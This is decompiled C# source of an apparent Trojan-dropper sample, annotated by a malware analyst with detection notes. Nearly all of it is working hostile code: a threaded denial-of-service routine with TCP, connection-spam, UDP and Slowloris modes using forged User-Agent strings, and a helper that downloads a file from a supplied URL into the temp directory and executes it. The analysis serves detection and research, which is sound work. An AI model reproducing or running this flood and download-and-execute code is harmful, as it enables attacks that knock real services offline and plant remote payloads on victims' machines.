// Decompiled with JetBrains decompiler
// Type: Poly.Function
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
//
// Analyst notes (added during review; the code below is unchanged decompiler output):
//   * This static class holds two capabilities of the sample: a multi-threaded
//     network-flood routine with four modes (see the Type enum) and a
//     download-to-%TEMP%-then-run helper (DlExecute / Update).
//   * The callers that pick the target, mode and URL are not part of this type.
//   * Host and network artifacts worth turning into detections are called out
//     in comments next to the code that produces them.

using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Security.Cryptography;
using System.Text;
using System.Threading;

namespace Poly
{
    public static class Function
    {
        // Shared run flag: every worker thread polls it, so clearing it is what stops the workers.
        private static bool active;
        // Target and tuning values; all are written only by InitFlood (sockets is also lowered in backStart).
        private static string host;
        private static int port;
        private static int sockets;
        private static int timeout;
        private static int packets;
        private static Function.Type currentType;
        // Launcher thread created by Begin(); it only spawns the workers and then ends.
        public static Thread bThread;
        // Parenthesised "platform" halves of the forged User-Agent values built in GenerateRequest.
        private static string[] userAgents = new string[28]
        {
            "(compatible; MSIE 6.0; Windows NT)",
            "(Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
            "(Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
            "(MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
            "[en] (WinNT; U)",
            "(compatible; MSIE 7.0; Windows NT 5.1; bgft)",
            "(compatible; MSIE 6.0; Win32)",
            "(X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
            "(X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801",
            "(SunOS 5.8 sun4u; U) Opera 5.0 [en]",
            "(compatible; Googlebot/2.1; http://www.google.com/bot.html)",
            "(X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 BAVM/1.0.0",
            "(X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
            "(Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Firefox/3.6",
            "Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326",
            "(Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50",
            "(Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
            "(X11; Linux x86_64; U; Linux Mint; en) Presto/2.2.15 Version/10.10",
            "(Macintosh; PPC Mac OS X; U; en) Opera 8.0",
            "(Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128",
            "(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
            "(iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3",
            "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
            "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
            "(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
            "(compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
            "(compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
            "(Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
        };
        // Product tokens prepended to a userAgents entry. The two tables are combined
        // independently, so mismatched pairs (e.g. an Opera token with an MSIE platform
        // string) can occur in the generated traffic.
        private static string[] browsers = new string[10]
        {
            "Opera/9.0",
            "Opera/8.90",
            "Opera/9.80",
            "Opera/9.33",
            "Mozilla/5.0",
            "Mozilla/4.08",
            "Mozilla/4.0",
            "Mozilla/3.6",
            "Mozilla/3.1",
            "Mozilla/3.0"
        };

        /// <summary>True while a flood started by <see cref="Begin"/> is considered running.</summary>
        public static bool Active => Function.active;

        /// <summary>Mode selected by the last <see cref="InitFlood"/> call.</summary>
        public static Function.Type CurrentType => Function.currentType;

        /// <summary>
        /// Returns the MD5 digest of <paramref name="input"/> (ASCII-encoded) as 32 upper-case hex characters.
        /// </summary>
        /// <remarks>Not called from within this type; its use elsewhere in the assembly is not visible here.</remarks>
        public static string MD5Hash(string input)
        {
            byte[] hash = MD5.Create().ComputeHash(Encoding.ASCII.GetBytes(input));
            StringBuilder stringBuilder = new StringBuilder();
            for (int index = 0; index < hash.Length; ++index)
                stringBuilder.Append(hash[index].ToString("X2"));
            return stringBuilder.ToString();
        }

        /// <summary>Name of the current mode, or null for a value outside the four enum members.</summary>
        public static string CurrentTypeAsString
        {
            get
            {
                switch (Function.currentType)
                {
                    case Function.Type.TCP:
                        return "TCP";
                    case Function.Type.SYN:
                        return "SYN";
                    case Function.Type.UDP:
                        return "UDP";
                    case Function.Type.Slowloris:
                        return "Slowloris";
                    default:
                        return (string) null;
                }
            }
        }

        /// <summary>
        /// Stores the parameters for the next run and clears the run flag. Nothing is sent here.
        /// </summary>
        /// <param name="type">Mode the worker threads will execute.</param>
        /// <param name="Host">Remote host name or address passed to the socket connect calls.</param>
        /// <param name="Port">Remote port.</param>
        /// <param name="Sockets">Number of worker threads <see cref="backStart"/> tries to create.</param>
        /// <param name="Packets">Per-round send limit used by the TCP and UDP modes.</param>
        /// <param name="Timeout">Pause in milliseconds between rounds (passed to Thread.Sleep).</param>
        public static void InitFlood(
            Function.Type type,
            string Host,
            int Port,
            int Sockets,
            int Packets,
            int Timeout)
        {
            Function.currentType = type;
            Function.host = Host;
            Function.port = Port;
            Function.sockets = Sockets;
            Function.packets = Packets;
            Function.timeout = Timeout;
            Function.active = false;
        }

        /// <summary>Sets the run flag and starts the launcher thread.</summary>
        public static void Begin()
        {
            Function.active = true;
            Function.bThread = new Thread(new ThreadStart(Function.backStart));
            Function.bThread.Start();
        }

        /// <summary>Clears the run flag and aborts the launcher thread.</summary>
        /// <remarks>
        /// Only bThread is aborted; the worker threads are separate and stop when they next
        /// read the cleared flag. bThread is dereferenced without a null check.
        /// </remarks>
        public static void Abort()
        {
            Function.active = false;
            Function.bThread.Abort();
        }

        /// <summary>Launcher body: creates one background worker thread per configured socket.</summary>
        private static void backStart()
        {
            for (int index = 0; index < Function.sockets; ++index)
            {
                try
                {
                    // Background threads do not keep the process alive on their own.
                    new Thread(new ThreadStart(Function.stress))
                    {
                        IsBackground = true
                    }.Start();
                }
                catch (OutOfMemoryException ex)
                {
                    // Thread creation failed: record a reduced count and stop spawning.
                    Function.sockets = index - 1;
                    break;
                }
            }
        }

        /// <summary>
        /// Worker body: repeats one round of the selected mode until the run flag is cleared,
        /// sleeping <c>timeout</c> milliseconds between rounds.
        /// </summary>
        /// <remarks>
        /// All modes use ordinary managed sockets (AddressFamily.InterNetwork, i.e. IPv4 only),
        /// so the traffic originates from the host's real address through the OS network stack.
        /// </remarks>
        private static void stress()
        {
            // Sends performed in the current round; reset after every round.
            int num = 0;
            while (Function.active)
            {
                switch (Function.currentType)
                {
                    case Function.Type.TCP:
                        // TCP stream socket: connect, send one random buffer (see tcpRandom), close.
                        Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        socket1.Blocking = false;
                        while (num < Function.packets)
                        {
                            if (Function.active)
                            {
                                try
                                {
                                    socket1.Connect(Function.host, Function.port);
                                    socket1.Send(Function.tcpRandom());
                                    socket1.Close();
                                    socket1 = (Socket) null;
                                }
                                catch
                                {
                                    socket1.Close();
                                    break;
                                }
                                ++num;
                                Thread.Sleep(1);
                            }
                            else
                                break;
                        }
                        Thread.Sleep(Function.timeout);
                        break;
                    case Function.Type.SYN:
                        // Despite the name, no raw packets are crafted: this starts an asynchronous
                        // connect on a normal TCP socket, waits 100 ms, then disconnects/closes.
                        // On the wire it appears as many short-lived connection attempts.
                        Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        socket2.Blocking = false;
                        try
                        {
                            socket2.BeginConnect(Function.host, Function.port, new AsyncCallback(Function.onConnect), (object) null);
                        }
                        catch
                        {
                        }
                        Thread.Sleep(100);
                        try
                        {
                            if (socket2.Connected)
                                socket2.Disconnect(false);
                            socket2.Close();
                        }
                        catch
                        {
                        }
                        Thread.Sleep(Function.timeout);
                        break;
                    case Function.Type.UDP:
                        // Connected UDP socket: up to `packets` datagrams of random bytes (see udpRandom).
                        Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                        socket3.Blocking = false;
                        Socket socket4;
                        try
                        {
                            socket3.Connect(Function.host, Function.port);
                            while (num < Function.packets && Function.active)
                            {
                                socket3.Send(Function.udpRandom());
                                ++num;
                                Thread.Sleep(1);
                            }
                            socket3.Close();
                            socket4 = (Socket) null;
                        }
                        catch
                        {
                            socket3.Close();
                            socket4 = (Socket) null;
                            // Leaves the switch without the inter-round sleep.
                            break;
                        }
                        Thread.Sleep(Function.timeout);
                        break;
                    case Function.Type.Slowloris:
                        // Opens one TCP connection and keeps writing header blocks from
                        // GenerateRequest every 2 seconds for as long as it stays connected.
                        Socket socket5 = (Socket) null;
                        try
                        {
                            socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                            socket5.Connect(Function.host, Function.port);
                            socket5.Send(Function.GenerateRequest());
                            while (socket5.Connected)
                            {
                                if (Function.active)
                                {
                                    socket5.Send(Function.GenerateRequest());
                                    Thread.Sleep(2000);
                                }
                                else
                                    break;
                            }
                        }
                        catch
                        {
                            socket5.Close();
                        }
                        Thread.Sleep(Function.timeout);
                        break;
                }
                num = 0;
            }
            // The loop above only ends once `active` reads false, so Abort() is reached
            // only if the flag was set again between the loop test and this check.
            if (!Function.active)
                return;
            Function.Abort();
        }

        /// <summary>Empty completion callback for the BeginConnect call in the SYN mode; EndConnect is never called.</summary>
        private static void onConnect(IAsyncResult ar)
        {
        }

        /// <summary>Returns a buffer of pseudo-random bytes with a length in [1470, 65507).</summary>
        private static byte[] udpRandom()
        {
            Random random = new Random();
            byte[] buffer = new byte[random.Next(1470, 65507)];
            random.NextBytes(buffer);
            return buffer;
        }

        /// <summary>Returns a buffer of pseudo-random bytes with a length in [1470, 65535).</summary>
        private static byte[] tcpRandom()
        {
            Random random = new Random();
            byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
            random.NextBytes(buffer);
            return buffer;
        }

        /// <summary>Builds the ASCII bytes of the HTTP header block sent by the Slowloris mode.</summary>
        /// <remarks>
        /// Network-signature material, all visible below:
        /// a "GET / HTTP/1.1" request line that nevertheless carries a Content-Length header,
        /// a custom "X-a: &lt;number&gt;" header, a User-Agent assembled from the two tables above,
        /// and a final "Connection: keep-alive" line written with Append (no line terminator),
        /// so the header block is never closed by an empty line. Line endings come from
        /// AppendLine, i.e. Environment.NewLine. Random.Next's upper bound is exclusive, so with
        /// "Length - 1" the last entry of each table is never selected.
        /// </remarks>
        private static byte[] GenerateRequest()
        {
            Random random = new Random();
            StringBuilder stringBuilder = new StringBuilder();
            stringBuilder.AppendLine("GET / HTTP/1.1");
            stringBuilder.AppendLine("Host: " + Function.host);
            stringBuilder.AppendLine("User-Agent: " + Function.browsers[random.Next(0, Function.browsers.Length - 1)] + " " + Function.userAgents[random.Next(0, Function.userAgents.Length - 1)]);
            stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
            stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
            stringBuilder.Append("Connection: keep-alive");
            return Encoding.ASCII.GetBytes(stringBuilder.ToString());
        }

        /// <summary>Downloads <paramref name="URL"/> to the temp directory and starts the resulting file.</summary>
        /// <returns>True when no exception was thrown; false otherwise.</returns>
        /// <remarks>
        /// No integrity check is performed in this overload. Host-side indicator: a process
        /// started from a "*.tmp.exe"-style path under the temp directory (see download).
        /// </remarks>
        public static bool DlExecute(string URL)
        {
            try
            {
                Process.Start(Function.download(URL));
                return true;
            }
            catch
            {
                return false;
            }
        }

        /// <summary>
        /// Downloads <paramref name="URL"/> and starts the file only if its MD5 matches <paramref name="MD5"/>.
        /// </summary>
        /// <returns>
        /// True whenever no exception was thrown, including the case where the hash did not
        /// match and nothing was started; false on any exception.
        /// </returns>
        public static bool DlExecute(string URL, string MD5)
        {
            try
            {
                string str = Function.download(URL);
                if (Function.verifyMD5(str, MD5))
                    Process.Start(str);
                return true;
            }
            catch
            {
                return false;
            }
        }

        /// <summary>
        /// Fetches <paramref name="URL"/> with WebClient into a new file in the temp directory
        /// and returns that file's path, or string.Empty when the download throws.
        /// </summary>
        /// <remarks>
        /// Forensic notes: Path.GetTempFileName() itself creates a file in the temp directory;
        /// the payload is written to that name with ".exe" appended, so both files remain.
        /// Nothing in this type deletes either file. The parsed URL is also written to stdout.
        /// </remarks>
        private static string download(string URL)
        {
            string str = string.Empty;
            Uri result;
            bool flag = Uri.TryCreate(URL, UriKind.Absolute, out result);
            // Input that is not an absolute URI is retried with an "http://" prefix.
            if (!flag)
                str = "http://" + URL;
            Console.WriteLine("Url is : {0}", (object) result);
            if (flag)
            {
                try
                {
                    string absoluteUri = result.AbsoluteUri;
                    string fileName = Path.GetTempFileName() + ".exe";
                    WebClient webClient = new WebClient();
                    webClient.DownloadFile(absoluteUri, fileName);
                    webClient.Dispose();
                    return fileName;
                }
                catch
                {
                    return string.Empty;
                }
            }
            else
            {
                try
                {
                    string address = str;
                    string fileName = Path.GetTempFileName() + ".exe";
                    WebClient webClient = new WebClient();
                    webClient.DownloadFile(address, fileName);
                    webClient.Dispose();
                    return fileName;
                }
                catch
                {
                    return string.Empty;
                }
            }
        }

        /// <summary>Returns the MD5 digest of the file at <paramref name="path"/> as lower-case hex.</summary>
        private static string getMD5(string path)
        {
            byte[] hash;
            using (Stream inputStream = (Stream) new BufferedStream((Stream) new FileStream(path, FileMode.Open), 1200000))
                hash = new MD5CryptoServiceProvider().ComputeHash(inputStream);
            StringBuilder stringBuilder = new StringBuilder();
            for (int index = 0; index < hash.Length; ++index)
                stringBuilder.Append(hash[index].ToString("x2"));
            return stringBuilder.ToString();
        }

        /// <summary>
        /// True when <paramref name="MD5"/> is 32 characters long and equals the file's MD5
        /// (case-insensitive, ordinal comparison).
        /// </summary>
        /// <remarks>The file is hashed before the length check, so a bad path throws from getMD5.</remarks>
        private static bool verifyMD5(string ExecutablePath, string MD5)
        {
            string md5 = Function.getMD5(ExecutablePath);
            return MD5.Length == 32 && StringComparer.OrdinalIgnoreCase.Compare(md5, MD5) == 0;
        }

        /// <summary>Downloads <paramref name="url"/> and returns the local path (string.Empty on failure); the file is not started here.</summary>
        public static string Update(string url)
        {
            string str = Function.download(url);
            // Both arms yield the download result; the conditional is a decompilation artifact or a no-op.
            return str == string.Empty ? string.Empty : str;
        }

        /// <summary>
        /// Downloads <paramref name="url"/> and returns the local path only when the file's MD5
        /// matches <paramref name="md5"/>; otherwise string.Empty.
        /// </summary>
        /// <remarks>On a mismatch the downloaded file is left on disk.</remarks>
        public static string Update(string url, string md5)
        {
            string ExecutablePath = Function.download(url);
            return ExecutablePath == string.Empty || !Function.verifyMD5(ExecutablePath, md5) ? string.Empty : ExecutablePath;
        }

        /// <summary>Flood modes handled by the switch in <see cref="stress"/>.</summary>
        public enum Type
        {
            TCP,
            SYN,
            UDP,
            Slowloris,
        }
    }
}